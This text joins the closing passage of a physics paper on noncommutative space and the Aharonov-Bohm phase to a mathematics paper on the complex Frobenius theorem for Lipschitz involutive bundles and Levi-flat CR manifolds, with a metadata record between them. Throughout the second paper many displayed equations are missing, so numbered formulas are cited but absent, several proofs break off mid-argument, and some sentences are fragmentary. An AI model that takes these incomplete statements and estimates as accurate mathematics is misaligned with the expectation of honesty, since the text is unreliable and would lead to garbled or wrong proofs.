On the other hand, in (20) we have an explicitly spin-dependent term in the expression for Ṗ, with a coordinate space singularity. Once again, in the alternative force equation (22), the leading term at low energy, θ(P × S)/X², reminds us of models with Rashba-type interactions [21]. Hence these effects can be relevant for the studies in [8,9]. Now we come to the results obtained in Section IV and their implications. As mentioned there, we consider the Snyder noncommutative space, as given in (23), and in the present case the θ-contribution to the AB phase (derived for the constant noncommutative case in [16,17]) gets multiplied by a dynamical factor. This leads to some interesting consequences. As in previous cases [16], we can also derive a bound on θ pertaining to experimental observations. We compute γ, the ratio of the AB phases appearing in the commutative and noncommutative cases, in (34); there, ∆φ_NC corresponds to the θ-contribution in (32), ∆φ refers to the θ = 0 commutative case, R denotes the electron radius in the experimental setup and λ_e is the Compton wavelength of the electron. Interestingly, in the present case, the extra dynamical factor cancels R in γ and reproduces the bound in an R-independent form. This is distinct from the previously obtained expressions [16], but the bound is much lower than that of [16]. Finally, we would like to remark on the effect a generic noncommutative space can have in the study of inequivalent quantizations in a non-simply connected manifold [22]. It is well known that the AB effect is a prototype example of a multiply connected domain, since the region of the solenoid that carries the magnetic flux is inaccessible to the charged particle. This leads to a punctured manifold Q = R² − δ (δ denoting the solenoidal area) with non-trivial first homotopy group Π_1(Q) = Z. One can still work in the trivial homotopy sector, but this requires additional topological terms in the action, which clearly show up in the path-integral quantization of the system. These issues have been extensively studied in [22] for normal (commutative) spacetime. As has been established here and before [16,17], the noncommutative nature of spacetime generates additional contributions to the AB phase, and this will directly affect the above-mentioned quantization programme. From the study of the modified quantization conditions, it might be possible to set an independent bound on θ. We intend to study this aspect in the future. | 2019-04-14T02:54:35.123Z | 2006-04-10T00:00:00.000 | {
"year": 2006,
"sha1": "b6f23ee7942e36d1a35720fc7da1ef6179321261",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/hep-th/0604068",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "55457927d20cce705b7611416ad46c40ebebfec5",
"s2fieldsofstudy": [
"Physics",
"Mathematics"
],
"extfieldsofstudy": [
"Physics"
]
} |
14196555 | pes2o/s2orc | v3-fos-license | The Complex Frobenius Theorem for Rough Involutive Structures
We establish a version of the complex Frobenius theorem in the context of a complex subbundle S of the complexified tangent bundle of a manifold, having minimal regularity. If the subbundle S defines the structure of a Levi-flat CR-manifold, it suffices that S be Lipschitz for our results to apply. A principal tool in the analysis is a precise version of the Newlander-Nirenberg theorem with parameters, for integrable almost complex structures with minimal regularity, which builds on previous recent work of the authors.
Introduction
The complex Frobenius theorem elucidates the structure of a complex subbundle S of the complexified tangent bundle CT Ω of a smooth manifold Ω, satisfying an involutivity condition, which can be stated as follows: if X and Y are (sufficiently regular) sections of S, then

(1.1) [X, Y] is a section of S,

(1.2) [X, Y̅] is a section of S + S̅.

Here, as usual, if X = X_0 + iX_1 and X_0, X_1 are real vector fields, we write X̅ = X_0 − iX_1, and the fiber of S̅ over p ∈ Ω is given as (1.3) S̅_p = {u − iv : u + iv ∈ S_p, u, v ∈ T_p Ω}.
2000 Mathematics Subject Classification: Primary 35N10. The second author was partially supported by NSF grant DMS-0139726. We also assume S + S̅ is a subbundle of CT Ω.
In case S = CS_0 is the complexification of a subbundle S_0 ⊂ T Ω, the condition (1.1) just says S_0 is involutive. (Here S̅ = S, and (1.2) provides no additional constraint.) In this case the result reduces to the real Frobenius theorem.
An opposite extreme arises when Ω has an almost complex structure, a section J of End T Ω satisfying J² = −I (which implies that dim Ω is even). We set (1.4) S_p = {u + iJu : u ∈ T_p Ω}, so a section of S has the form X + iJX, for a general real vector field X. The condition (1.1) is that if Y is also a real vector field, then [X + iJX, Y + iJY] = Z + iJZ for a real vector field Z. This is equivalent to the vanishing of the Nijenhuis tensor, defined by

(1.5) N(X, Y) = [JX, JY] − [X, Y] − J[JX, Y] − J[X, JY].

The content of the Newlander-Nirenberg theorem [NN] is that under this formal integrability hypothesis Ω has local holomorphic coordinates, i.e., functions u_1, ..., u_k : O → C forming a coordinate system on a neighborhood O of a given p ∈ Ω, such that (X + iJX)u_ℓ ≡ 0 for all real vector fields X. Thus Ω has the structure of a complex manifold. In this case S + S̅ = CT Ω, so (1.2) automatically holds. There are other cases, where (1.2) has a nontrivial effect, as will be seen below.
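To make the equivalence in the preceding paragraph explicit, here is a short derivation sketch in the notation above (sign conventions for N vary in the literature):

% For real vector fields X, Y:
[X+iJX,\, Y+iJY] = \big([X,Y]-[JX,JY]\big) + i\big([JX,Y]+[X,JY]\big).
% This lies in S iff J applied to the real part gives the imaginary part:
%   J([X,Y]-[JX,JY]) = [JX,Y]+[X,JY];
% applying J once more and using J^2 = -I, this condition is precisely
% N(X,Y) = 0, with N as in (1.5).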
The complex Frobenius theorem was established in [Ni] for C ∞ bundles S ⊂ CT Ω satisfying (1.1)-(1.2). A major ingredient in the proof was the Newlander-Nirenberg theorem, which had been established in [NN] for almost complex structures with a fairly high degree of smoothness. Later proofs of the Newlander-Nirenberg theorem, by [NW] and by [M], work for almost complex structures J of class C 1+r with r > 0, i.e., when J has Hölder continuous first order derivatives. In [HT] the needed regularity on J was reduced to J ∈ C r with r > 1/2. (More general conditions were considered in [HT], which we will not discuss here.) The case of Lipschitz J found an immediate application in [LM].
Regarding the real Frobenius theorem, standard arguments, though frequently phrased in the context of smooth subbundles of T Ω, work for C 1 bundles. The real Frobenius theorem was extended in [Ha] to include Lipschitz subbundles.
Our main goal here is to extend Nirenberg's complex Frobenius theorem to the setting of rough bundles S ⊂ CT Ω satisfying (1.1)-(1.2). We will assume that S and S + S are Lipschitz subbundles of CT Ω. Note that if X and Y are Lipschitz sections of S, then [X, Y ] and [X, Y ] are vector fields with L ∞ coefficients. For an important class of bundles S, namely those giving rise to Levi-flat CR-structures (defined below) this regularity hypothesis will suffice. In the general case we need an additional hypothesis, given in (1.16) below. We mention that [Ho] established a version of a complex Frobenius theorem in a setting of C 1 vector fields, with C 1 commutators, but with a somewhat different thrust.
We now set up a basic strategy for obtaining such a complex Frobenius theorem, and indicate what extra analysis has to be done to treat the non-smooth case. It is convenient to begin by constructing some further subbundles of the real tangent bundle T Ω. For each p ∈ Ω, set (1.6) E p = {u ∈ T p Ω : u + iv ∈ S p , for some v ∈ T p Ω} = {w + w : w ∈ S p }, the fiber over p of a Lipschitz bundle E. Noting that if u, v ∈ T p Ω and u + iv ∈ S p , then also v − iu ∈ S p , so v ∈ E p , we see that (1.7) S + S = CE.
Next, set (1.8) V p = S p ∩ T p Ω, the fiber over p of a Lipschitz vector bundle V. Note that if u, v ∈ T p Ω, (1.9) u + iv ∈ S p ∩ S p ⇐⇒ u + iv ∈ S p and u − iv ∈ S p ⇐⇒ u ∈ S p and v ∈ S p .
The hypotheses (1.1)-(1.2) imply E and V are involutive subbundles of T Ω, i.e., (1.11) X, Y ∈ Lip(Ω, E) ⟹ [X, Y] ∈ L∞(Ω, E), together with its analogue for V. On the other hand, one does not recover (1.1)-(1.2) from (1.11) alone, as our second example illustrates. In that example, with S_p given by (1.4), we have E = T Ω, V = 0, and (1.11) always holds, regardless of whether N in (1.5) vanishes. To capture (1.1)-(1.2), an additional structure arises: namely, a complex structure on the quotient bundle E/V, defined as follows. Take u ∈ E_p, so there exists v ∈ T_p Ω such that u + iv ∈ S_p; in fact, v ∈ E_p. We propose to set Ju = v, so the element of S_p has the form u + iJu. However, the element v associated to u ∈ E_p is not necessarily unique. In fact, given u, v, v′ ∈ T_p Ω with u + iv ∈ S_p, we have u + iv′ ∈ S_p if and only if v − v′ ∈ V_p. In other words, given u ∈ E_p, the residue class of Ju is well defined in E_p/V_p. Furthermore, if u ∈ V_p, one can take v = 0, so J descends from a linear map

J : E_p/V_p → E_p/V_p.
Since u + iv ∈ S_p ⇔ v − iu ∈ S_p, we also have J² = −I. The integrability hypotheses (1.1)-(1.2) are equivalent to (1.11), coupled to an integrability hypothesis on J, which we describe below. Let us first consider the case V = 0. Then J is a complex structure on the involutive bundle E, and (generalizing (1.4)) we have

S_p = {u + iJu : u ∈ E_p},

or equivalently Lipschitz sections of S have the form X + iJX, where X is a Lipschitz section of E. Then the involutivity hypothesis (1.1)-(1.2) is equivalent to the involutivity of E plus the vanishing of N, given by (1.5), for X, Y ∈ Lip(Ω, E). One says that Ω has the structure of a Levi-flat CR manifold. The real Frobenius theorem implies that Ω is foliated by leaves tangent to E. Each such leaf then inherits an almost complex structure, and the Newlander-Nirenberg theorem implies each such leaf has local holomorphic coordinates. Briefly put, Ω is foliated by complex manifolds. The complex Frobenius theorem in this context says a little more: namely, any p ∈ Ω has a neighborhood O on which there are functions u_1, ..., u_k, providing holomorphic coordinates on each leaf, intersected with O, and having some regularity on O. In the case of a C∞ bundle S, [Ni] obtained such u_j ∈ C∞(O). In the context of Lipschitz structures, we obtain certain Hölder continuity of u_j, described in further detail below. A key ingredient in the analysis is a Newlander-Nirenberg theorem with parameters. In the smooth case this follows by the methods of [NN], as noted there and used in [Ni]. We devote §4 to a consideration of families of integrable almost complex structures with minimal regularity, building on techniques of [M] and of [HT]. We now turn to the case V ≠ 0. In this case, we supplement the Lipschitz hypotheses on S and S + S̅ with the following hypothesis. Say dim V_p = ℓ ≤ k = dim E_p. We assume that each p ∈ Ω has a neighborhood on which there is a local Lipschitz frame field {X_1, ..., X_k} for E, such that {X_1, ..., X_ℓ} is a local frame field for V and the commutation condition (1.16) holds. This can be regarded as a hypothesis on the regularity with which V sits in E; we discuss it further in §6. We will show that the relevant structures are invariant under the flows F^t_{X_i} generated by the X_i; hence we can mod out by the F^t_{X_i}, 1 ≤ i ≤ ℓ.
In §5 we tie together the material of §§2-4 to obtain results on the existence and regularity of functions on open sets of a Lipschitz Levi-flat CR manifold Ω that are leafwise holomorphic (functions known as CR functions). Our primary result, Proposition 5.1, yields CR functions ϕ_j, 1 ≤ j ≤ m + n − k, on a neighborhood U_1 of a point p ∈ Ω, having the property that

(1.19) Φ = (ϕ_1, ..., ϕ_{m+n−k}) : U_1 → C^m × R^{n−k}

is a homeomorphism of U_1 onto an open subset, and such that, given s < 1/2, ϕ_j and Xϕ_j are Hölder continuous of degree s, for any X ∈ Lip(U_1, E). A complementary result, Proposition 5.2, shows that Φ in (1.19) can be taken to be a C¹ diffeomorphism, provided that S, and hence E and J, are regular of class C^ρ for some ρ > 3/2. The results of [HT] extending the Newlander-Nirenberg theorem to cases where the almost complex structure is merely C^{1/2+ε} regular, and complementary results of §4, play an important role in the proof. We end §5 with a brief discussion of C^{1,1} submanifolds of C^N that have the structure of Levi-flat CR-manifolds. The general complex Frobenius theorem is then treated in §6.
At the end of this paper we have two appendices. Appendix A is devoted to a Frobenius theorem for real analytic, complex vector fields. There are classical results of this nature; cf. [Ni] for some references. One motivation for us to include a self contained treatment of such a result here arises from the nature of our analysis of the Newlander-Nirenberg theorem with parameters in §4. Following [M], we construct the local holomorphic coordinate chart as a composition, F = G • H. The map H is obtained via an implicit function theorem, the use of which enables us to keep track of its dependence on a parametrized family of integrable almost complex structures. The construction of H arranges things so that constructing G amounts to establishing the Newlander-Nirenberg theorem in the real analytic category, a task to which the material of Appendix A is applicable, and this material makes it clear how the factor G depends on parameters.
Finally, Appendix B gives a special treatment of the construction of CR functions on a rough Levi-flat CR manifold whose leaves have real dimension 2. The classical method of constructing isothermal coordinates is adapted to this problem and yields sharper results than one obtains in the case of higher dimensional leaves via the methods of §4. This leads to improved results in §5 in the case of 2-dimensional leaves, as is noted there.
We end this introduction with a few remarks on function spaces arising in our analysis. For a smoothly bounded domain U , C r (U) denotes the space of functions with derivatives of order ≤ r continuous on U , if r is a positive integer. If r = k + s, k ∈ Z + , 0 < s < 1, it denotes the space of functions whose kth order derivatives are Hölder continuous of order s. In addition, we make use of Zygmund spaces C r * (U ), coinciding with C r (U) for r ∈ R + \Z + , and having nice interpolation properties at r ∈ Z + . The spaces C r * (U) are also defined for r < 0. There are a number of available treatments of Zygmund spaces; we mention Chapter 13, §8 of [T] as one source. As is usual, Lip(U) denotes the space of Lipschitz continuous functions, i.e., functions Hölder continuous of exponent one, and C 1,1 (U ) denotes the space of functions whose first order derivatives belong to Lip(U ).
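As a supplement (this standard characterization is not spelled out in the text, which simply cites [T], Ch. 13, §8), the Zygmund norm in the range relevant below can be described via second differences:

\| f \|_{C^r_*} = \| f \|_{L^\infty}
  + \sup_{h \neq 0} |h|^{-r}\, \| f(\cdot + h) + f(\cdot - h) - 2 f \|_{L^\infty},
\qquad 0 < r < 2,

which agrees with the Hölder norm C^r for 0 < r < 1, while C^1_* strictly contains Lip.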
Real Frobenius theorem for involutive Lipschitz bundles
Let E be a sub-bundle of the tangent bundle T Ω, of fiber dimension k. We assume E is Lipschitz, in the sense that any p_0 ∈ Ω has a neighborhood O on which there are Lipschitz vector fields X_1, ..., X_k spanning E at each point. We make the involutivity hypothesis that [X_i, X_j] is a section of E at almost all points of O, or equivalently that there exist c^ℓ_ij ∈ L∞(O) such that

(2.1) [X_i, X_j] = Σ_ℓ c^ℓ_ij X_ℓ.

We want to discuss the existence and qualitative properties of the foliation of Ω whose leaves are tangent to E. We may as well assume k < n = dim Ω. Suppose we have coordinates centered at p_0 such that the X_j(p_0) form the first k standard basis elements of R^n, for 1 ≤ j ≤ k.
If we denote by X̅_j(x) the image of X_j(x) under the standard projection R^n → R^k, then the k × k matrix with columns X̅_1(x), ..., X̅_k(x) is invertible, for x in a neighborhood of p_0 (which we now denote O). We set Y_i = Σ_j a_ij X_j, where (a_ij(x)) is the inverse of that matrix. It follows that

(2.4) Y_j = ∂/∂x_j + Σ_{ℓ=k+1}^n b_jℓ(x) ∂/∂x_ℓ,

and, by (2.1),

(2.5) [Y_i, Y_j] = Σ_ℓ c̃^ℓ_ij Y_ℓ

for certain c̃^ℓ_ij ∈ L∞(O). Comparison of (2.4) and (2.5) yields c̃^ℓ_ij ≡ 0, so we have a local Lipschitz frame field {Y_1, ..., Y_k} for E satisfying

(2.6) [Y_i, Y_j] = 0.
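The step from (2.4)-(2.5) to c̃ ≡ 0 deserves a one-line justification, which the text leaves implicit; a sketch in the notation above:

% The dx_1, ..., dx_k components of each Y_j in (2.4) are constant, so
[Y_i, Y_j] \in \mathrm{span}\{\partial_{x_{k+1}}, \dots, \partial_{x_n}\} \quad \text{a.e.,}
% while the \partial_{x_\ell} component (\ell \le k) of
% \sum_\ell \tilde c^{\ell}_{ij} Y_\ell in (2.5) is exactly \tilde c^{\ell}_{ij}.
% Hence \tilde c^{\ell}_{ij} = 0 a.e., which gives (2.6).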
In fact, this result is a special case of Corollary 4.1 of [Ha]. We make some further comments on it. If F t Y j denotes the flow generated by Y j , we see that and inductively (2.10) The order can be changed, and we have Conversely, once one knows that (2.11) follows from (2.6), one can prove Proposition 2.1. However, this implication is less straightforward for Lipschitz vector fields than it is for smooth vector fields. In connection with this, we mention the following analytical point, which plays a key role in the proof in [Ha]. Namely, let {J ε : 0 < ε ≤ 1} be a Friedrichs mollifier and let Y i , Y j be Lipschitz vector fields satisfying (2.6). Then, as ε → 0, locally uniformly on O. Actually this is a reformulation (of a special case) of Proposition 5.3 of [Ha]. It is stronger and more useful than the obvious fact that such convergence holds weak * in L ∞ . What is behind it is the more general fact that, for any two Lipschitz vector fields X and Y on O, locally uniformly on O. This follows from the fact that locally uniformly on O, and since clearly J ε f → f locally uniformly on O this in turn is equivalent to the fact that locally uniformly on O, which is a standard Friedrichs-type commutator estimate. We record that y(t, x) has extra regularity in t.
Recall that we are in a coordinate system in which (2.4) holds, with Y^#_i(p_0) = 0, p_0 = 0. For z close to 0 in R^{n−k} and |t| < δ, we define

(2.17) G(t, z) = F^{t_1}_{Y_1} ··· F^{t_k}_{Y_k}(0, z),

where we regard (0, z) ∈ R^k × R^{n−k}. Proof. We want to show that if (t, z) and (s, w) are distinct points in a small neighborhood of (0, 0), then x_1 = G(t, z) and x_2 = G(s, w) are not too close. Note that (2.20)-(2.22) hold; comparing them yields the desired separation estimate.
The pull-back of a Levi-flat CR structure
In §2 we constructed a bi-Lipschitz map taking the sets z = z_0 to leaves of the foliation whose tangent space is the involutive bundle E. Now we take k = 2m and suppose there is a complex structure on E, J ∈ End(E). We pull this back to a complex structure J_0 ∈ End(E_0), examine its regularity, and show that if J is formally integrable then so is J_0. Since Lipschitz sections of E are given as linear combinations over Lip(U_1) of the vector fields Y_1, ..., Y_k, the action of J is determined by its action on the Y_j. We can make various hypotheses on the regularity of J. For example, we might assume

(3.3) J ∈ Lip(U_1, End E),

or we might make the weaker hypothesis

(3.4) J ∈ C^r(U_1, End E),

for some r ∈ (1/2, 1). In any case, the complex structure induced on E_0 is given by the pull-back formula, and it is clear that J_0 is Lipschitz in the former case and of class C^r in the latter, provided 0 < r < 1.
We next discuss integrability conditions. One approach would be to form the "Nijenhuis" tensor (3.7) associated to J, defined as in (1.5), for Lipschitz sections X and Y of E. If J is Lipschitz, then (3.7) belongs to L∞(U_1). If J satisfies (3.4) with r > 1/2, then by Lemma 1.2 of [HT] the right side of (3.7) is a distribution belonging to C^{r−1}_*(U_1). Now such a singular distribution does not necessarily pull back well under a bi-Lipschitz map. Instead, we will work on individual leaves.
We start by defining N_0, the analogue of (3.7) for J_0 on each leaf. In light of this, the following is useful.
The Newlander-Nirenberg theorem with parameters
The Newlander-Nirenberg theorem provides local holomorphic coordinates on a manifold Ω with an almost complex structure satisfying the formal integrability condition that its Nijenhuis tensor vanishes. In the setting of a relatively smooth almost complex structure J the smooth dependence of such coordinate functions on J was noted in [NN] and played a role in [Ni]. Here we aim to examine the dependence of such coordinates on J, in appropriate function spaces, in the context of the lower regularity hypotheses made here. Verifying this regularity will involve giving a review of the method of construction of holomorphic coordinates introduced in [M], with modifications as in [HT] to handle the still weaker regularity hypotheses made here.
Given p_0 ∈ Ω, take coordinates x = (x_1, ..., x_{2m}), centered at p_0, with respect to which (4.1) holds. The condition for a function f, defined near p_0, to be holomorphic is that f be annihilated by the vector fields (4.2), and in light of (4.1) we have J(∂/∂x_j) = ∂/∂x_{j+m} + Σ_{ℓ=1}^{2m} c_jℓ ∂/∂x_ℓ with c_jℓ(0) = 0 (p_0 = 0). Setting y_j = x_{j+m}, ∂/∂z_j = (1/2)(∂/∂x_j − i ∂/∂y_j), ∂/∂z̄_j = (1/2)(∂/∂x_j + i ∂/∂y_j), we can write these complex vector fields as in (4.3). Next, by a device similar to that used in (2.2)-(2.4), we can take linear combinations of these vector fields to obtain

(4.4) Z_j = ∂/∂z̄_j + Σ_ℓ a_jℓ ∂/∂z_ℓ.

If J is of class C^r, then the coefficients in (4.3) and (4.4) are also of class C^r. The formal integrability condition is that the Lie brackets [X_j, X_ℓ] are all linear combinations of X_1, ..., X_m. If J ∈ C^1, then [X_j, X_ℓ] is a linear combination with continuous coefficients. If J ∈ C^r with r > 1/2, then the Lie brackets are still well defined, and the coefficients are distributions of class C^{r−1}_*. In such a case, it follows that the brackets [Z_j, Z_ℓ] are linear combinations of Z_1, ..., Z_m, which forces (4.5). It is convenient to use matrix notation. Set A_j = (a_j1, ..., a_jm) (a row vector), A = (a_jℓ), F = (f_1, ..., f_m) (a row vector), and ∂/∂z = (∂/∂z_1, ..., ∂/∂z_m)^t (a column vector). The condition that f_1, ..., f_m be J-holomorphic is then

(4.6) ∂F/∂z̄_j + A_j (∂/∂z)F = 0, 1 ≤ j ≤ m,

and the formal integrability condition (4.5) takes the matrix form (4.7). The proof of the Newlander-Nirenberg theorem consists of the construction of F, mapping a neighborhood of p_0 in Ω diffeomorphically onto a neighborhood of 0 in C^m, and solving (4.6).
Malgrange's method constructs F as a composition

(4.8) F = G ∘ H.

Different techniques are applied to construct the diffeomorphisms G and H. We run through these constructions, paying particular attention to the dependence on the matrix A. The Cauchy-Riemann equations (4.6) transform to (4.9), or equivalently (4.10), with B defined by (4.11). The formal integrability condition (4.7) implies the corresponding formal integrability of the new Cauchy-Riemann equations, i.e., (4.12), where B_j are the rows of B, 1 ≤ j ≤ m. Furthermore, if B satisfies (4.11), then the actual integrability, i.e., the existence of a diffeomorphism G satisfying (4.9), is equivalent to the actual integrability of J, i.e., the existence of a diffeomorphism F satisfying (4.6).
A key idea of [M], to guarantee the existence of a diffeomorphism G satisfying (4.9), is to construct H in such a fashion that, if B is defined by (4.11), then the additional condition (4.13) holds. Equivalently, the task is to construct a diffeomorphism H on a neighborhood U of p_0 = 0 in C^m such that, if B is defined by (4.11), then (4.13) holds. It is convenient to dilate the z-variable, so that A(z) in (4.11) is replaced by A_t(z) = A(tz), and we solve on the unit ball, which we denote U, for sufficiently small positive t. Note that if A ∈ C^r_* and A(0) = 0, then ‖A_t‖_{C^r_*(U)} → 0 as t → 0. If we relabel A_t as A, we want to establish the following variant of Lemma 3.2 of [HT]. To state it, let us set

(4.14) A_r(η) = {A ∈ C^r_*(U) : A(0) = 0, ‖A‖_{C^r(U)} < η}.
and such that B ∈ C^r_*(U), defined by (4.11), satisfies (4.13), and ‖B‖_{L∞(U)} < ε. Furthermore, H is obtained as a C¹ map, where A_r(η) is as in (4.14) and (4.20).
Having described how to obtain the holomorphic coordinate system (4.8), we want to examine how it depends on A. So we pick (4.38) with r > 1/2 and η > 0 sufficiently small, and turn to the task of estimating, in turn (with obvious notation), The assertion from Proposition 4.1 that the map (4.17) is C 1 leads immediately to our first estimate: (4.39) We also have a C 1 map in light of the formula (4.11). Hence (4.41) where O is a neighborhood of 0 containing H −1 (U) for all H as in (4.16). Consequently (4.42) Let us write We have (4.44) Putting together (4.43)-(4.45), using the estimates (4.41)-(4.42), we obtain (4.46) , 1 2 < ρ, s < 1.
(It is convenient to replace r by ρ in our use of (4.45) and to replace r by s in our use of (4.42) and (4.44). Typically we will want to take ρ as large as possible and s as small as possible.) The estimate (4.46) is a relatively weak estimate, a consequence of the rather rough dependence of B • K on K. Fortunately, (4.46) can be improved substantially via use of the fact that B 1 and B 2 both satisfy the elliptic system (4.34).
In fact, as one sees from (4.12)-(4.13), a α (B) = a 0 α + M α B, with M α a linear map, and hence V solves the linear elliptic system (with real analytic coefficients) The estimates (4.37) hold for B 1 and B 2 . Local elliptic regularity results yield (4.49) Then the method of solving (4.9) covered in Appendix A gives (4.50) Under the bounds on H j in C 1+r and on G j in C N produced above, we have, for U b ⊂⊂ U, r ∈ (1/2, 1), and (4.53)
Hence we obtain the estimate (4.54), given 1/2 < r, s, ρ < 1. For the last inequality we have used (4.46); as in that estimate, we typically want to take ρ as large as possible and s as small as possible.
Structure of Levi-flat CR-manifolds
In this section we assume S is a Lipschitz subbundle of CT Ω, satisfying (5.1) S p ∩ S p = 0, ∀ p ∈ Ω.
Hence S p + S p has constant dimension (say k), and so does E p , defined by (1.6). It follows that E and S + S are Lipschitz vector bundles, and of course V = 0. The bundle E ⊂ T Ω gets a complex structure (5.2) J ∈ Lip(Ω, End E),
and (5.3)
We make the involutivity hypotheses (1.1)-(1.2). As explained in the introduction, this is equivalent to the hypothesis that E is involutive plus the hypothesis that the Nijenhuis tensor of J vanishes. A manifold Ω with such a structure (E, J) is said to be a Levi-flat CR-manifold.
In Given the regularity of X and Z, we see that Zf is a well defined distribution for any f ∈ L 2 loc (O). Our goal here is to construct a rich class of CR functions f having the regularity given s < 1/2. In fact f and Xf will have further regularity along the leaves of the foliation tangent to E, as will be explained below.
To begin the construction of such CR functions, we implement the results of § §2-3. For any p ∈ Ω, there are a neighborhood U 1 of p, a neighborhood U 0 of 0 ∈ R n (n = dim Ω) and a bi-Lipschitz map G : U 0 → U 1 , pulling E back to the bundle E # spanned by ∂/∂t 1 , . . . ∂/∂t k , where in U 0 ⊂ R k × R n−k we have coordinates (t, z) = (t 1 , . . . , t k , z 1 , . . . , z n−k ). Furthermore, Lipschitz sections of E are transformed to Lipschitz vector fields on U 0 , and J is transformed to We may as well assume U 0 = U ′ 0 × U ′′ 0 , where U ′ 0 is a neighborhood of 0 ∈ R k and U ′′ 0 a neighborhood of 0 ∈ R n−k . Then J 0 = J 0 (z) is effectively a family of integrable almost complex structures on U ′ 0 , parametrized by z ∈ U ′′ 0 . Of course k is even; say k = 2m. Now we can apply the results of §4. We construct holomorphic functions F = (f 1 , . . . , f m ) on U ′ 0 , depending on z as a parameter, say F = F z : U ′ 0 → C m , z ∈ U ′′ 0 . (Note that z has a different role here than in §4; this should not cause confusion.) We construct F z as a composition: The family of diffeomorphisms H z is constructed in Proposition 4.1, via an implicit function theorem. Perhaps after shrinking U ′ 0 and U ′′ 0 , we have H z ∈ C 1+r (U ′ 0 ) for each z ∈ U ′ 0 , given r < 1, and if 1/2 < r < 1. Here we have used (5.10) As explained in §4, the construction of G z follows from the real-analytic version of the Newlander-Nirenberg theorem, a presentation of which is given here, in Appendix A. Then we obtain F z = G z • H z , and, by (4.54), with given 1/2 < r, s, ρ < 1. Here we pick ρ = 1 − ε, s = 1/2 + ε, and use (5.10) to obtain given r ∈ (1/2, 1), and taking ε (hence δ) sufficiently small. The functions f j (t, z) given by F z (t) = (f 1 (t, z), . . . , f m (t, z)) are CR functions on U 0 . In addition, the functions ϕ j (t, z) = z j , 1 ≤ j ≤ n − k, are CR functions on U 0 . Then (5.13) Φ(t, z) = (f 1 (t, z), . . . , f m (t, z), z 1 , . . . , z n−k ) gives a Hölder continuous homeomorphism of U 0 (possibly shrunken some more) onto an open subset of C m × R n−k . We compose with G −1 to get associated CR functions on U 1 ⊂ Ω. Let us formally record the result.
Proposition 5.1. Given Ω with a Lipschitz, Levi-flat CR structure and p ∈ Ω, there exist a neighborhood U_1 of p and a homeomorphism

(5.14) Φ : U_1 → C^m × R^{n−k} (onto its image),

whose components are CR functions ϕ_1, ..., ϕ_{m+n−k} on U_1. We have

(5.15) ϕ_j, Xϕ_j ∈ C^s(U_1), for all X ∈ Lip(U_1, E),

for any s < 1/2. Furthermore, Φ is a C^{1+r}-embedding of each leaf in U_1, tangent to E, into C^m × R^{n−k}, for each r < 1.
Remark. Note that if ψ is a smooth function on a neighborhood of the range of Φ in C m ×R n−k and if ψ is holomorphic in the C m -variables, then ψ(ϕ 1 , . . . , ϕ m+n−k ) is a CR function on U 1 .
If dim S_p = 1, so k = 2 and the leaves tangent to E are 2-dimensional, then we can use the results of Appendix B in place of those of §4. Consequently we can improve the regularity result (5.15) to (5.16), where, given a > 0, (5.17) holds for 0 < δ ≤ 1. We now give a sufficient condition for the existence of a CR embedding Φ as in (5.14) that is a C¹ diffeomorphism.
Proposition 5.2.
Assume Ω is a Levi-flat CR manifold with a CR structure regular of class C ρ , with ρ > 3/2. Then the map Φ in (5.14) can be taken to be a C 1 diffeomorphism.
Proof. The new regularity hypothesis is that S is a C ρ bundle. Thus E and J are regular of class C ρ , and these structures pull back to C ρ structures under the map G, which is a C ρ diffeomorphism. In particular, A(t, z) is a C 1 function of z with values in C s (U ′ 0 ), with s = ρ − 1 > 1/2. Thus the implicit function theorem argument of Proposition 4.1 yields H z , a C 1 function of z with values in C 1+s . From here, one obtains C 1 dependence of G z on z and the result follows.
Note that if the leaves tangent to E are 2-dimensional, we can obtain the conclusion of Proposition 5.2 whenever ρ > 1, again using the results of Appendix B in place of those of §4.
Remarks on the embedded case. Suppose Ω ⊂ C N is a C 1,1 submanifold, of real dimension d, and that T p Ω ∩ JT p Ω = E p has constant real dimension k = 2m, so Ω has the structure of a CR-manifold. The vector bundle E ⊂ T Ω is a Lipschitz vector bundle, and the condition that E be involutive is equivalent to the condition that Ω is a Levi-flat CR-manifold. In such a case, the results of §2 imply that Ω is foliated by manifolds, of real dimension k, tangent to E, and smooth of class C 1,1 .
In this case one does not need the Newlander-Nirenberg theorem (or a refinement) to establish that these leaves are complex manifolds. Rather, methods going back to Levi-Civita [LC], and developed further in [Som], [Fr], and [Pin], suffice. Levi-Civita's result for a single leaf is that a C^1 submanifold M ⊂ C^N, all of whose tangent spaces are complex linear subspaces of C^N, is a complex submanifold.

Proof. Fix p ∈ M, and represent M near p as the graph over the complex vector space V = T_pM; one verifies that the graphing function is holomorphic, using the J-invariance of the tangent spaces.

In the setting above, we have a family M_z of leaves, depending in a Lipschitz fashion on z ∈ U ⊂ R^ℓ, where d = ℓ + k. Given p ∈ Ω, say p ∈ M_{z_0}, pick V = T_pM_{z_0}, and for z close to z_0 we have M_z locally a graph over O ⊂ V. The comments above give local holomorphic diffeomorphisms G_z : O → M_z ⊂ C^N. This construction, as we have said, is essentially classical. The one point to make here is that we have the Frobenius theory of [Ha], so we are able to treat submanifolds of class C^{1,1}, while previous treatments take Ω to be of class C^2. In connection with this, we note that Theorem 2.1 of [Pin] refers to CR-manifolds in C^N of class C^m, with m ≥ 1, but a perusal of the proof shows that the author means to say the relevant tangent spaces are smooth of class C^m, which holds if Ω ⊂ C^N is a submanifold of class C^{m+1} (satisfying the CR property).
The complex Frobenius theorem
We recall our set-up. We have a Lipschitz bundle S ⊂ CT Ω, we assume S + S̄ is also a Lipschitz bundle, and we assume the involutivity condition (6.1), namely that Lipschitz sections of S are closed under the Lie bracket. We then form the Lipschitz bundles V ⊂ E ⊂ T Ω, with fibers V_p = S_p ∩ T_pΩ and E_p = (S_p + S̄_p) ∩ T_pΩ, which therefore satisfy V ⊂ E, with dim E_p − dim V_p even. Furthermore, we have a complex structure on E/V, which we denote J. Our proximate goal is to construct a Levi-flat CR manifold as a quotient (locally) of Ω, via the action of a local group of flows generated by sections of V. In order to achieve this, we need a further hypothesis on the regularity with which V sits in E. One way to put it is the following. Say dim V_p = ℓ ≤ k = dim E_p.
Hypothesis V. Each p ∈ Ω has a neighborhood U_1 on which there is a local Lipschitz frame field {X_1, ..., X_k} for E, such that {X_1, ..., X_ℓ} is a local frame field for V and the bracket condition (6.6) holds for these fields.

Later we will give other conditions that imply Hypothesis V, but for now we show how it leads to the desired quotient space.
